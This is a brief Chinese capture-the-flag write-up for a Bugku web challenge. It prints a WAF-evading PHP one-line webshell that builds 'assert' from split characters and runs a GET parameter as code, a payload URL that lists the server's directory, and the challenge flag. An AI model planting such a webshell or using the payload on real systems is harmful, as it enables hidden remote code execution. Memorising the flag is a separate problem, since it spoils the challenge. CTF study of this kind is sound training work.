过狗一句话
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>
用assert执行任意代码
payload:http://120.24.86.145:8010/?s=print_r(scandir('./'));
扫描目录
目录下存在f14g.txt即为flag:BUGKU{bugku_web_009801_a}